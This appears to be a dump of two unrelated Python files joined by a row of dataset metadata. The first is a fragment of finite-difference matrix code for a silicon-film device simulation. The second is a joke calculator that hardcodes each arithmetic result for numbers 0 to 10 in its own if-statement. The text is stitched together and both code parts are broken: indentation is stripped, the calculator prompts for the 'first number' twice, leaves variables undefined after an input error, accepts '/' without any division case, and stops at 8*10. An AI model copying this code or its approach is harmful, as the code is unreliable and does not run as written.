for i_node in np.arange((Ntotal-Nx*(t_bota+1)), Ntotal):
if(i_node >= (Ntotal-Nx*(t_bota+1)) and i_node <= (Ntotal-Nx*t_bota -1)):
F_prime[i_node, i_node-Nx-1] = -dy/dx/8.0
F_prime[i_node, i_node-Nx] = -(dx/dy-dy/dx/4.0)
F_prime[i_node, i_node-Nx+1] = -dy/dx/8.0
F_prime[i_node, i_node-1] = -(eps_bot/eps_si+1)*dy/dx*3.0/8.0
F_prime[i_node, i_node] = (eps_bot/eps_si+1)*(dy/dx*3.0/4.0+dx/dy)
F_prime[i_node, i_node+1] = -(eps_bot/eps_si+1)*dy/dx*3.0/8.0
F_prime[i_node, i_node+Nx-1] = -eps_bot/eps_si*dy/dx/8.0
F_prime[i_node, i_node+Nx] = -eps_bot/eps_si*(dx/dy-dy/dx/4.0)
F_prime[i_node, i_node+Nx+1] = -eps_bot/eps_si*dy/dx/8.0
elif(i_node >= (Ntotal-Nx) and i_node <= (Ntotal-Nx+Lsda -1)):
F_prime[i_node, i_node] = 1
F_prime[i_node, i_node-Nx] = -1
elif(i_node >= (Ntotal-Nx+Lsda) and i_node <= (Ntotal-Nx+Lsda+Lg_bota)):
F_prime[i_node, i_node] = 1
elif(i_node >= (Ntotal-Nx+1+Lsda+Lg_bota) and i_node <= Ntotal -1):
F_prime[i_node, i_node] =1
F_prime[i_node, i_node-Nx] = -1
else:
F_prime[i_node, i_node-Nx] = -eps_bot/eps_si*dx/dy
F_prime[i_node, i_node-1] = -eps_bot/eps_si*dy/dx
F_prime[i_node, i_node] = 2.0*(dx/dy+dy/dx)*eps_bot/eps_si
F_prime[i_node, i_node+1] = -eps_bot/eps_si*dy/dx
F_prime[i_node, i_node+Nx] = -eps_bot/eps_si*dx/dy
# Specify the F_prime matrix in
# the silicon film region
###########################
for i_node in np.arange((Nx*(t_topa+1)), (Ntotal-Nx*(t_bota+1))):
F_prime[i_node, i_node-Nx] = -dx/dy
F_prime[i_node, i_node-1] = -dy/dx
F_prime[i_node, i_node] = 2.0*(dx/dy+dy/dx)
F_prime[i_node, i_node+1] = -dy/dx
F_prime[i_node, i_node+Nx] = -dx/dy
# Modify the F_prime matrix at
# the right and left boundaries
###########################
i_node_l = 0
i_node_r = Nx - 1
for iii in np.arange(0, Ny):
if iii == 0:
F_prime[i_node_l, :] = 0
F_prime[i_node_l, i_node_l] = 2
F_prime[i_node_l, i_node_l+1] = -1
F_prime[i_node_l, i_node_l+Nx] = -1
F_prime[i_node_r, :] = 0
F_prime[i_node_r, i_node_r] = 2
F_prime[i_node_r, i_node_r-1] = -1
F_prime[i_node_r, i_node_r+Nx] = -1
elif(iii > 0 and iii < round((Nx*(t_topa))/Nx)):
F_prime[i_node_l, :] = 0
F_prime[i_node_l, i_node_l] = 1
F_prime[i_node_l, i_node_l+1] = -1
F_prime[i_node_r, :] = 0
F_prime[i_node_r, i_node_r] = 1
F_prime[i_node_r, i_node_r-1] = -1
elif(iii >= round((Nx*(t_topa))/Nx) and iii <= round((Ntotal-Nx*t_bota)/Nx - 1)):
F_prime[i_node_l, :] = 0
F_prime[i_node_l, i_node_l] = 1
F_prime[i_node_l, i_node_l+1] = -1
F_prime[i_node_r, :] = 0
F_prime[i_node_r, i_node_r] = 1
F_prime[i_node_r, i_node_r-1] = -1
elif(iii > round((Ntotal-Nx*t_bota)/Nx - 1) and iii<Ny -1):
F_prime[i_node_l, :] = 0
F_prime[i_node_l, i_node_l] = 1
F_prime[i_node_l, i_node_l+1] = -1
F_prime[i_node_r, :] = 0
F_prime[i_node_r, i_node_r] = 1
F_prime[i_node_r, i_node_r-1] = -1
elif iii == Ny-1 and ((Ntotal-Nx+1) < (Ntotal-Nx+1+Lsda)) and ((Ntotal-Nx+1+Lsda+Lg_bota) < Ntotal):
F_prime[i_node_l, :] = 0
F_prime[i_node_l, i_node_l] = 2
F_prime[i_node_l, i_node_l+1] = -1
F_prime[i_node_l, i_node_l-Nx] = -1
F_prime[i_node_r, :] = 0
F_prime[i_node_r, i_node_r] = 2
F_prime[i_node_r, i_node_r-1] = -1
F_prime[i_node_r, i_node_r-Nx] = -1
i_node_l = (1+iii)*Nx
i_node_r = (2+iii)*Nx - 1
#####################################################
# END OF SPECIFYING F_prime
##################################################### | 46.697842 | 108 | 0.50285 | 1,157 | 6,491 | 2.489196 | 0.064823 | 0.289931 | 0.187153 | 0.294097 | 0.801389 | 0.768403 | 0.729514 | 0.711111 | 0.697569 | 0.663194 | 0 | 0.034864 | 0.262055 | 6,491 | 139 | 109 | 46.697842 | 0.566388 | 0.038669 | 0 | 0.381818 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.009091 | false | 0 | 0.009091 | 0 | 0.018182 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
6b9fcd6f41b72008f61cd8963c62b85ec62ed1ab | 37,195 | py | Python | my_first_calculator_0_to_10.py | PrinceShaji/NoobCalculator | 7f2c002b563edae21b7e9c7c422dc43e1eb70bf8 | [
"MIT"
] | null | null | null | my_first_calculator_0_to_10.py | PrinceShaji/NoobCalculator | 7f2c002b563edae21b7e9c7c422dc43e1eb70bf8 | [
"MIT"
] | null | null | null | my_first_calculator_0_to_10.py | PrinceShaji/NoobCalculator | 7f2c002b563edae21b7e9c7c422dc43e1eb70bf8 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# Welcome to my first calculator.
# Inspired by https://github.com/AceLewis.
# This calculator can calculate numbers from 1 to 10.
try:
number1 = int(input('Enter first number: '))
operation = input('Enter the operation [+, -, *, /]: ')
number2 = int(input('Enter first number: '))
except:
print('Only input digits.Try again.')
allowed_operations = ('+', '-', '*', '/')
print('\n')
if operation in allowed_operations:
pass
else:
print('Invalid operation!')
exit()
if number1 == 0 and operation == '+' and number2 == 0:
print("0+0 = 0")
if number1 == 0 and operation == '+' and number2 == 1:
print("0+1 = 1")
if number1 == 0 and operation == '+' and number2 == 2:
print("0+2 = 2")
if number1 == 0 and operation == '+' and number2 == 3:
print("0+3 = 3")
if number1 == 0 and operation == '+' and number2 == 4:
print("0+4 = 4")
if number1 == 0 and operation == '+' and number2 == 5:
print("0+5 = 5")
if number1 == 0 and operation == '+' and number2 == 6:
print("0+6 = 6")
if number1 == 0 and operation == '+' and number2 == 7:
print("0+7 = 7")
if number1 == 0 and operation == '+' and number2 == 8:
print("0+8 = 8")
if number1 == 0 and operation == '+' and number2 == 9:
print("0+9 = 9")
if number1 == 0 and operation == '+' and number2 == 10:
print("0+10 = 10")
if number1 == 1 and operation == '+' and number2 == 0:
print("1+0 = 1")
if number1 == 1 and operation == '+' and number2 == 1:
print("1+1 = 2")
if number1 == 1 and operation == '+' and number2 == 2:
print("1+2 = 3")
if number1 == 1 and operation == '+' and number2 == 3:
print("1+3 = 4")
if number1 == 1 and operation == '+' and number2 == 4:
print("1+4 = 5")
if number1 == 1 and operation == '+' and number2 == 5:
print("1+5 = 6")
if number1 == 1 and operation == '+' and number2 == 6:
print("1+6 = 7")
if number1 == 1 and operation == '+' and number2 == 7:
print("1+7 = 8")
if number1 == 1 and operation == '+' and number2 == 8:
print("1+8 = 9")
if number1 == 1 and operation == '+' and number2 == 9:
print("1+9 = 10")
if number1 == 1 and operation == '+' and number2 == 10:
print("1+10 = 11")
if number1 == 2 and operation == '+' and number2 == 0:
print("2+0 = 2")
if number1 == 2 and operation == '+' and number2 == 1:
print("2+1 = 3")
if number1 == 2 and operation == '+' and number2 == 2:
print("2+2 = 4")
if number1 == 2 and operation == '+' and number2 == 3:
print("2+3 = 5")
if number1 == 2 and operation == '+' and number2 == 4:
print("2+4 = 6")
if number1 == 2 and operation == '+' and number2 == 5:
print("2+5 = 7")
if number1 == 2 and operation == '+' and number2 == 6:
print("2+6 = 8")
if number1 == 2 and operation == '+' and number2 == 7:
print("2+7 = 9")
if number1 == 2 and operation == '+' and number2 == 8:
print("2+8 = 10")
if number1 == 2 and operation == '+' and number2 == 9:
print("2+9 = 11")
if number1 == 2 and operation == '+' and number2 == 10:
print("2+10 = 12")
if number1 == 3 and operation == '+' and number2 == 0:
print("3+0 = 3")
if number1 == 3 and operation == '+' and number2 == 1:
print("3+1 = 4")
if number1 == 3 and operation == '+' and number2 == 2:
print("3+2 = 5")
if number1 == 3 and operation == '+' and number2 == 3:
print("3+3 = 6")
if number1 == 3 and operation == '+' and number2 == 4:
print("3+4 = 7")
if number1 == 3 and operation == '+' and number2 == 5:
print("3+5 = 8")
if number1 == 3 and operation == '+' and number2 == 6:
print("3+6 = 9")
if number1 == 3 and operation == '+' and number2 == 7:
print("3+7 = 10")
if number1 == 3 and operation == '+' and number2 == 8:
print("3+8 = 11")
if number1 == 3 and operation == '+' and number2 == 9:
print("3+9 = 12")
if number1 == 3 and operation == '+' and number2 == 10:
print("3+10 = 13")
if number1 == 4 and operation == '+' and number2 == 0:
print("4+0 = 4")
if number1 == 4 and operation == '+' and number2 == 1:
print("4+1 = 5")
if number1 == 4 and operation == '+' and number2 == 2:
print("4+2 = 6")
if number1 == 4 and operation == '+' and number2 == 3:
print("4+3 = 7")
if number1 == 4 and operation == '+' and number2 == 4:
print("4+4 = 8")
if number1 == 4 and operation == '+' and number2 == 5:
print("4+5 = 9")
if number1 == 4 and operation == '+' and number2 == 6:
print("4+6 = 10")
if number1 == 4 and operation == '+' and number2 == 7:
print("4+7 = 11")
if number1 == 4 and operation == '+' and number2 == 8:
print("4+8 = 12")
if number1 == 4 and operation == '+' and number2 == 9:
print("4+9 = 13")
if number1 == 4 and operation == '+' and number2 == 10:
print("4+10 = 14")
if number1 == 5 and operation == '+' and number2 == 0:
print("5+0 = 5")
if number1 == 5 and operation == '+' and number2 == 1:
print("5+1 = 6")
if number1 == 5 and operation == '+' and number2 == 2:
print("5+2 = 7")
if number1 == 5 and operation == '+' and number2 == 3:
print("5+3 = 8")
if number1 == 5 and operation == '+' and number2 == 4:
print("5+4 = 9")
if number1 == 5 and operation == '+' and number2 == 5:
print("5+5 = 10")
if number1 == 5 and operation == '+' and number2 == 6:
print("5+6 = 11")
if number1 == 5 and operation == '+' and number2 == 7:
print("5+7 = 12")
if number1 == 5 and operation == '+' and number2 == 8:
print("5+8 = 13")
if number1 == 5 and operation == '+' and number2 == 9:
print("5+9 = 14")
if number1 == 5 and operation == '+' and number2 == 10:
print("5+10 = 15")
if number1 == 6 and operation == '+' and number2 == 0:
print("6+0 = 6")
if number1 == 6 and operation == '+' and number2 == 1:
print("6+1 = 7")
if number1 == 6 and operation == '+' and number2 == 2:
print("6+2 = 8")
if number1 == 6 and operation == '+' and number2 == 3:
print("6+3 = 9")
if number1 == 6 and operation == '+' and number2 == 4:
print("6+4 = 10")
if number1 == 6 and operation == '+' and number2 == 5:
print("6+5 = 11")
if number1 == 6 and operation == '+' and number2 == 6:
print("6+6 = 12")
if number1 == 6 and operation == '+' and number2 == 7:
print("6+7 = 13")
if number1 == 6 and operation == '+' and number2 == 8:
print("6+8 = 14")
if number1 == 6 and operation == '+' and number2 == 9:
print("6+9 = 15")
if number1 == 6 and operation == '+' and number2 == 10:
print("6+10 = 16")
if number1 == 7 and operation == '+' and number2 == 0:
print("7+0 = 7")
if number1 == 7 and operation == '+' and number2 == 1:
print("7+1 = 8")
if number1 == 7 and operation == '+' and number2 == 2:
print("7+2 = 9")
if number1 == 7 and operation == '+' and number2 == 3:
print("7+3 = 10")
if number1 == 7 and operation == '+' and number2 == 4:
print("7+4 = 11")
if number1 == 7 and operation == '+' and number2 == 5:
print("7+5 = 12")
if number1 == 7 and operation == '+' and number2 == 6:
print("7+6 = 13")
if number1 == 7 and operation == '+' and number2 == 7:
print("7+7 = 14")
if number1 == 7 and operation == '+' and number2 == 8:
print("7+8 = 15")
if number1 == 7 and operation == '+' and number2 == 9:
print("7+9 = 16")
if number1 == 7 and operation == '+' and number2 == 10:
print("7+10 = 17")
if number1 == 8 and operation == '+' and number2 == 0:
print("8+0 = 8")
if number1 == 8 and operation == '+' and number2 == 1:
print("8+1 = 9")
if number1 == 8 and operation == '+' and number2 == 2:
print("8+2 = 10")
if number1 == 8 and operation == '+' and number2 == 3:
print("8+3 = 11")
if number1 == 8 and operation == '+' and number2 == 4:
print("8+4 = 12")
if number1 == 8 and operation == '+' and number2 == 5:
print("8+5 = 13")
if number1 == 8 and operation == '+' and number2 == 6:
print("8+6 = 14")
if number1 == 8 and operation == '+' and number2 == 7:
print("8+7 = 15")
if number1 == 8 and operation == '+' and number2 == 8:
print("8+8 = 16")
if number1 == 8 and operation == '+' and number2 == 9:
print("8+9 = 17")
if number1 == 8 and operation == '+' and number2 == 10:
print("8+10 = 18")
if number1 == 9 and operation == '+' and number2 == 0:
print("9+0 = 9")
if number1 == 9 and operation == '+' and number2 == 1:
print("9+1 = 10")
if number1 == 9 and operation == '+' and number2 == 2:
print("9+2 = 11")
if number1 == 9 and operation == '+' and number2 == 3:
print("9+3 = 12")
if number1 == 9 and operation == '+' and number2 == 4:
print("9+4 = 13")
if number1 == 9 and operation == '+' and number2 == 5:
print("9+5 = 14")
if number1 == 9 and operation == '+' and number2 == 6:
print("9+6 = 15")
if number1 == 9 and operation == '+' and number2 == 7:
print("9+7 = 16")
if number1 == 9 and operation == '+' and number2 == 8:
print("9+8 = 17")
if number1 == 9 and operation == '+' and number2 == 9:
print("9+9 = 18")
if number1 == 9 and operation == '+' and number2 == 10:
print("9+10 = 19")
if number1 == 10 and operation == '+' and number2 == 0:
print("10+0 = 10")
if number1 == 10 and operation == '+' and number2 == 1:
print("10+1 = 11")
if number1 == 10 and operation == '+' and number2 == 2:
print("10+2 = 12")
if number1 == 10 and operation == '+' and number2 == 3:
print("10+3 = 13")
if number1 == 10 and operation == '+' and number2 == 4:
print("10+4 = 14")
if number1 == 10 and operation == '+' and number2 == 5:
print("10+5 = 15")
if number1 == 10 and operation == '+' and number2 == 6:
print("10+6 = 16")
if number1 == 10 and operation == '+' and number2 == 7:
print("10+7 = 17")
if number1 == 10 and operation == '+' and number2 == 8:
print("10+8 = 18")
if number1 == 10 and operation == '+' and number2 == 9:
print("10+9 = 19")
if number1 == 10 and operation == '+' and number2 == 10:
print("10+10 = 20")
if number1 == 0 and operation == '-' and number2 == 0:
print("0-0 = 0")
if number1 == 0 and operation == '-' and number2 == 1:
print("0-1 = -1")
if number1 == 0 and operation == '-' and number2 == 2:
print("0-2 = -2")
if number1 == 0 and operation == '-' and number2 == 3:
print("0-3 = -3")
if number1 == 0 and operation == '-' and number2 == 4:
print("0-4 = -4")
if number1 == 0 and operation == '-' and number2 == 5:
print("0-5 = -5")
if number1 == 0 and operation == '-' and number2 == 6:
print("0-6 = -6")
if number1 == 0 and operation == '-' and number2 == 7:
print("0-7 = -7")
if number1 == 0 and operation == '-' and number2 == 8:
print("0-8 = -8")
if number1 == 0 and operation == '-' and number2 == 9:
print("0-9 = -9")
if number1 == 0 and operation == '-' and number2 == 10:
print("0-10 = -10")
if number1 == 1 and operation == '-' and number2 == 0:
print("1-0 = 1")
if number1 == 1 and operation == '-' and number2 == 1:
print("1-1 = 0")
if number1 == 1 and operation == '-' and number2 == 2:
print("1-2 = -1")
if number1 == 1 and operation == '-' and number2 == 3:
print("1-3 = -2")
if number1 == 1 and operation == '-' and number2 == 4:
print("1-4 = -3")
if number1 == 1 and operation == '-' and number2 == 5:
print("1-5 = -4")
if number1 == 1 and operation == '-' and number2 == 6:
print("1-6 = -5")
if number1 == 1 and operation == '-' and number2 == 7:
print("1-7 = -6")
if number1 == 1 and operation == '-' and number2 == 8:
print("1-8 = -7")
if number1 == 1 and operation == '-' and number2 == 9:
print("1-9 = -8")
if number1 == 1 and operation == '-' and number2 == 10:
print("1-10 = -9")
if number1 == 2 and operation == '-' and number2 == 0:
print("2-0 = 2")
if number1 == 2 and operation == '-' and number2 == 1:
print("2-1 = 1")
if number1 == 2 and operation == '-' and number2 == 2:
print("2-2 = 0")
if number1 == 2 and operation == '-' and number2 == 3:
print("2-3 = -1")
if number1 == 2 and operation == '-' and number2 == 4:
print("2-4 = -2")
if number1 == 2 and operation == '-' and number2 == 5:
print("2-5 = -3")
if number1 == 2 and operation == '-' and number2 == 6:
print("2-6 = -4")
if number1 == 2 and operation == '-' and number2 == 7:
print("2-7 = -5")
if number1 == 2 and operation == '-' and number2 == 8:
print("2-8 = -6")
if number1 == 2 and operation == '-' and number2 == 9:
print("2-9 = -7")
if number1 == 2 and operation == '-' and number2 == 10:
print("2-10 = -8")
if number1 == 3 and operation == '-' and number2 == 0:
print("3-0 = 3")
if number1 == 3 and operation == '-' and number2 == 1:
print("3-1 = 2")
if number1 == 3 and operation == '-' and number2 == 2:
print("3-2 = 1")
if number1 == 3 and operation == '-' and number2 == 3:
print("3-3 = 0")
if number1 == 3 and operation == '-' and number2 == 4:
print("3-4 = -1")
if number1 == 3 and operation == '-' and number2 == 5:
print("3-5 = -2")
if number1 == 3 and operation == '-' and number2 == 6:
print("3-6 = -3")
if number1 == 3 and operation == '-' and number2 == 7:
print("3-7 = -4")
if number1 == 3 and operation == '-' and number2 == 8:
print("3-8 = -5")
if number1 == 3 and operation == '-' and number2 == 9:
print("3-9 = -6")
if number1 == 3 and operation == '-' and number2 == 10:
print("3-10 = -7")
if number1 == 4 and operation == '-' and number2 == 0:
print("4-0 = 4")
if number1 == 4 and operation == '-' and number2 == 1:
print("4-1 = 3")
if number1 == 4 and operation == '-' and number2 == 2:
print("4-2 = 2")
if number1 == 4 and operation == '-' and number2 == 3:
print("4-3 = 1")
if number1 == 4 and operation == '-' and number2 == 4:
print("4-4 = 0")
if number1 == 4 and operation == '-' and number2 == 5:
print("4-5 = -1")
if number1 == 4 and operation == '-' and number2 == 6:
print("4-6 = -2")
if number1 == 4 and operation == '-' and number2 == 7:
print("4-7 = -3")
if number1 == 4 and operation == '-' and number2 == 8:
print("4-8 = -4")
if number1 == 4 and operation == '-' and number2 == 9:
print("4-9 = -5")
if number1 == 4 and operation == '-' and number2 == 10:
print("4-10 = -6")
if number1 == 5 and operation == '-' and number2 == 0:
print("5-0 = 5")
if number1 == 5 and operation == '-' and number2 == 1:
print("5-1 = 4")
if number1 == 5 and operation == '-' and number2 == 2:
print("5-2 = 3")
if number1 == 5 and operation == '-' and number2 == 3:
print("5-3 = 2")
if number1 == 5 and operation == '-' and number2 == 4:
print("5-4 = 1")
if number1 == 5 and operation == '-' and number2 == 5:
print("5-5 = 0")
if number1 == 5 and operation == '-' and number2 == 6:
print("5-6 = -1")
if number1 == 5 and operation == '-' and number2 == 7:
print("5-7 = -2")
if number1 == 5 and operation == '-' and number2 == 8:
print("5-8 = -3")
if number1 == 5 and operation == '-' and number2 == 9:
print("5-9 = -4")
if number1 == 5 and operation == '-' and number2 == 10:
print("5-10 = -5")
if number1 == 6 and operation == '-' and number2 == 0:
print("6-0 = 6")
if number1 == 6 and operation == '-' and number2 == 1:
print("6-1 = 5")
if number1 == 6 and operation == '-' and number2 == 2:
print("6-2 = 4")
if number1 == 6 and operation == '-' and number2 == 3:
print("6-3 = 3")
if number1 == 6 and operation == '-' and number2 == 4:
print("6-4 = 2")
if number1 == 6 and operation == '-' and number2 == 5:
print("6-5 = 1")
if number1 == 6 and operation == '-' and number2 == 6:
print("6-6 = 0")
if number1 == 6 and operation == '-' and number2 == 7:
print("6-7 = -1")
if number1 == 6 and operation == '-' and number2 == 8:
print("6-8 = -2")
if number1 == 6 and operation == '-' and number2 == 9:
print("6-9 = -3")
if number1 == 6 and operation == '-' and number2 == 10:
print("6-10 = -4")
if number1 == 7 and operation == '-' and number2 == 0:
print("7-0 = 7")
if number1 == 7 and operation == '-' and number2 == 1:
print("7-1 = 6")
if number1 == 7 and operation == '-' and number2 == 2:
print("7-2 = 5")
if number1 == 7 and operation == '-' and number2 == 3:
print("7-3 = 4")
if number1 == 7 and operation == '-' and number2 == 4:
print("7-4 = 3")
if number1 == 7 and operation == '-' and number2 == 5:
print("7-5 = 2")
if number1 == 7 and operation == '-' and number2 == 6:
print("7-6 = 1")
if number1 == 7 and operation == '-' and number2 == 7:
print("7-7 = 0")
if number1 == 7 and operation == '-' and number2 == 8:
print("7-8 = -1")
if number1 == 7 and operation == '-' and number2 == 9:
print("7-9 = -2")
if number1 == 7 and operation == '-' and number2 == 10:
print("7-10 = -3")
if number1 == 8 and operation == '-' and number2 == 0:
print("8-0 = 8")
if number1 == 8 and operation == '-' and number2 == 1:
print("8-1 = 7")
if number1 == 8 and operation == '-' and number2 == 2:
print("8-2 = 6")
if number1 == 8 and operation == '-' and number2 == 3:
print("8-3 = 5")
if number1 == 8 and operation == '-' and number2 == 4:
print("8-4 = 4")
if number1 == 8 and operation == '-' and number2 == 5:
print("8-5 = 3")
if number1 == 8 and operation == '-' and number2 == 6:
print("8-6 = 2")
if number1 == 8 and operation == '-' and number2 == 7:
print("8-7 = 1")
if number1 == 8 and operation == '-' and number2 == 8:
print("8-8 = 0")
if number1 == 8 and operation == '-' and number2 == 9:
print("8-9 = -1")
if number1 == 8 and operation == '-' and number2 == 10:
print("8-10 = -2")
if number1 == 9 and operation == '-' and number2 == 0:
print("9-0 = 9")
if number1 == 9 and operation == '-' and number2 == 1:
print("9-1 = 8")
if number1 == 9 and operation == '-' and number2 == 2:
print("9-2 = 7")
if number1 == 9 and operation == '-' and number2 == 3:
print("9-3 = 6")
if number1 == 9 and operation == '-' and number2 == 4:
print("9-4 = 5")
if number1 == 9 and operation == '-' and number2 == 5:
print("9-5 = 4")
if number1 == 9 and operation == '-' and number2 == 6:
print("9-6 = 3")
if number1 == 9 and operation == '-' and number2 == 7:
print("9-7 = 2")
if number1 == 9 and operation == '-' and number2 == 8:
print("9-8 = 1")
if number1 == 9 and operation == '-' and number2 == 9:
print("9-9 = 0")
if number1 == 9 and operation == '-' and number2 == 10:
print("9-10 = -1")
if number1 == 10 and operation == '-' and number2 == 0:
print("10-0 = 10")
if number1 == 10 and operation == '-' and number2 == 1:
print("10-1 = 9")
if number1 == 10 and operation == '-' and number2 == 2:
print("10-2 = 8")
if number1 == 10 and operation == '-' and number2 == 3:
print("10-3 = 7")
if number1 == 10 and operation == '-' and number2 == 4:
print("10-4 = 6")
if number1 == 10 and operation == '-' and number2 == 5:
print("10-5 = 5")
if number1 == 10 and operation == '-' and number2 == 6:
print("10-6 = 4")
if number1 == 10 and operation == '-' and number2 == 7:
print("10-7 = 3")
if number1 == 10 and operation == '-' and number2 == 8:
print("10-8 = 2")
if number1 == 10 and operation == '-' and number2 == 9:
print("10-9 = 1")
if number1 == 10 and operation == '-' and number2 == 10:
print("10-10 = 0")
if number1 == 0 and operation == '*' and number2 == 0:
print("0*0 = 0")
if number1 == 0 and operation == '*' and number2 == 1:
print("0*1 = 0")
if number1 == 0 and operation == '*' and number2 == 2:
print("0*2 = 0")
if number1 == 0 and operation == '*' and number2 == 3:
print("0*3 = 0")
if number1 == 0 and operation == '*' and number2 == 4:
print("0*4 = 0")
if number1 == 0 and operation == '*' and number2 == 5:
print("0*5 = 0")
if number1 == 0 and operation == '*' and number2 == 6:
print("0*6 = 0")
if number1 == 0 and operation == '*' and number2 == 7:
print("0*7 = 0")
if number1 == 0 and operation == '*' and number2 == 8:
print("0*8 = 0")
if number1 == 0 and operation == '*' and number2 == 9:
print("0*9 = 0")
if number1 == 0 and operation == '*' and number2 == 10:
print("0*10 = 0")
if number1 == 1 and operation == '*' and number2 == 0:
print("1*0 = 0")
if number1 == 1 and operation == '*' and number2 == 1:
print("1*1 = 1")
if number1 == 1 and operation == '*' and number2 == 2:
print("1*2 = 2")
if number1 == 1 and operation == '*' and number2 == 3:
print("1*3 = 3")
if number1 == 1 and operation == '*' and number2 == 4:
print("1*4 = 4")
if number1 == 1 and operation == '*' and number2 == 5:
print("1*5 = 5")
if number1 == 1 and operation == '*' and number2 == 6:
print("1*6 = 6")
if number1 == 1 and operation == '*' and number2 == 7:
print("1*7 = 7")
if number1 == 1 and operation == '*' and number2 == 8:
print("1*8 = 8")
if number1 == 1 and operation == '*' and number2 == 9:
print("1*9 = 9")
if number1 == 1 and operation == '*' and number2 == 10:
print("1*10 = 10")
if number1 == 2 and operation == '*' and number2 == 0:
print("2*0 = 0")
if number1 == 2 and operation == '*' and number2 == 1:
print("2*1 = 2")
if number1 == 2 and operation == '*' and number2 == 2:
print("2*2 = 4")
if number1 == 2 and operation == '*' and number2 == 3:
print("2*3 = 6")
if number1 == 2 and operation == '*' and number2 == 4:
print("2*4 = 8")
if number1 == 2 and operation == '*' and number2 == 5:
print("2*5 = 10")
if number1 == 2 and operation == '*' and number2 == 6:
print("2*6 = 12")
if number1 == 2 and operation == '*' and number2 == 7:
print("2*7 = 14")
if number1 == 2 and operation == '*' and number2 == 8:
print("2*8 = 16")
if number1 == 2 and operation == '*' and number2 == 9:
print("2*9 = 18")
if number1 == 2 and operation == '*' and number2 == 10:
print("2*10 = 20")
if number1 == 3 and operation == '*' and number2 == 0:
print("3*0 = 0")
if number1 == 3 and operation == '*' and number2 == 1:
print("3*1 = 3")
if number1 == 3 and operation == '*' and number2 == 2:
print("3*2 = 6")
if number1 == 3 and operation == '*' and number2 == 3:
print("3*3 = 9")
if number1 == 3 and operation == '*' and number2 == 4:
print("3*4 = 12")
if number1 == 3 and operation == '*' and number2 == 5:
print("3*5 = 15")
if number1 == 3 and operation == '*' and number2 == 6:
print("3*6 = 18")
if number1 == 3 and operation == '*' and number2 == 7:
print("3*7 = 21")
if number1 == 3 and operation == '*' and number2 == 8:
print("3*8 = 24")
if number1 == 3 and operation == '*' and number2 == 9:
print("3*9 = 27")
if number1 == 3 and operation == '*' and number2 == 10:
print("3*10 = 30")
if number1 == 4 and operation == '*' and number2 == 0:
print("4*0 = 0")
if number1 == 4 and operation == '*' and number2 == 1:
print("4*1 = 4")
if number1 == 4 and operation == '*' and number2 == 2:
print("4*2 = 8")
if number1 == 4 and operation == '*' and number2 == 3:
print("4*3 = 12")
if number1 == 4 and operation == '*' and number2 == 4:
print("4*4 = 16")
if number1 == 4 and operation == '*' and number2 == 5:
print("4*5 = 20")
if number1 == 4 and operation == '*' and number2 == 6:
print("4*6 = 24")
if number1 == 4 and operation == '*' and number2 == 7:
print("4*7 = 28")
if number1 == 4 and operation == '*' and number2 == 8:
print("4*8 = 32")
if number1 == 4 and operation == '*' and number2 == 9:
print("4*9 = 36")
if number1 == 4 and operation == '*' and number2 == 10:
print("4*10 = 40")
if number1 == 5 and operation == '*' and number2 == 0:
print("5*0 = 0")
if number1 == 5 and operation == '*' and number2 == 1:
print("5*1 = 5")
if number1 == 5 and operation == '*' and number2 == 2:
print("5*2 = 10")
if number1 == 5 and operation == '*' and number2 == 3:
print("5*3 = 15")
if number1 == 5 and operation == '*' and number2 == 4:
print("5*4 = 20")
if number1 == 5 and operation == '*' and number2 == 5:
print("5*5 = 25")
if number1 == 5 and operation == '*' and number2 == 6:
print("5*6 = 30")
if number1 == 5 and operation == '*' and number2 == 7:
print("5*7 = 35")
if number1 == 5 and operation == '*' and number2 == 8:
print("5*8 = 40")
if number1 == 5 and operation == '*' and number2 == 9:
print("5*9 = 45")
if number1 == 5 and operation == '*' and number2 == 10:
print("5*10 = 50")
if number1 == 6 and operation == '*' and number2 == 0:
print("6*0 = 0")
if number1 == 6 and operation == '*' and number2 == 1:
print("6*1 = 6")
if number1 == 6 and operation == '*' and number2 == 2:
print("6*2 = 12")
if number1 == 6 and operation == '*' and number2 == 3:
print("6*3 = 18")
if number1 == 6 and operation == '*' and number2 == 4:
print("6*4 = 24")
if number1 == 6 and operation == '*' and number2 == 5:
print("6*5 = 30")
if number1 == 6 and operation == '*' and number2 == 6:
print("6*6 = 36")
if number1 == 6 and operation == '*' and number2 == 7:
print("6*7 = 42")
if number1 == 6 and operation == '*' and number2 == 8:
print("6*8 = 48")
if number1 == 6 and operation == '*' and number2 == 9:
print("6*9 = 54")
if number1 == 6 and operation == '*' and number2 == 10:
print("6*10 = 60")
if number1 == 7 and operation == '*' and number2 == 0:
print("7*0 = 0")
if number1 == 7 and operation == '*' and number2 == 1:
print("7*1 = 7")
if number1 == 7 and operation == '*' and number2 == 2:
print("7*2 = 14")
if number1 == 7 and operation == '*' and number2 == 3:
print("7*3 = 21")
if number1 == 7 and operation == '*' and number2 == 4:
print("7*4 = 28")
if number1 == 7 and operation == '*' and number2 == 5:
print("7*5 = 35")
if number1 == 7 and operation == '*' and number2 == 6:
print("7*6 = 42")
if number1 == 7 and operation == '*' and number2 == 7:
print("7*7 = 49")
if number1 == 7 and operation == '*' and number2 == 8:
print("7*8 = 56")
if number1 == 7 and operation == '*' and number2 == 9:
print("7*9 = 63")
if number1 == 7 and operation == '*' and number2 == 10:
print("7*10 = 70")
if number1 == 8 and operation == '*' and number2 == 0:
print("8*0 = 0")
if number1 == 8 and operation == '*' and number2 == 1:
print("8*1 = 8")
if number1 == 8 and operation == '*' and number2 == 2:
print("8*2 = 16")
if number1 == 8 and operation == '*' and number2 == 3:
print("8*3 = 24")
if number1 == 8 and operation == '*' and number2 == 4:
print("8*4 = 32")
if number1 == 8 and operation == '*' and number2 == 5:
print("8*5 = 40")
if number1 == 8 and operation == '*' and number2 == 6:
print("8*6 = 48")
if number1 == 8 and operation == '*' and number2 == 7:
print("8*7 = 56")
if number1 == 8 and operation == '*' and number2 == 8:
print("8*8 = 64")
if number1 == 8 and operation == '*' and number2 == 9:
print("8*9 = 72")
if number1 == 8 and operation == '*' and number2 == 10:
print("8*10 = 80")
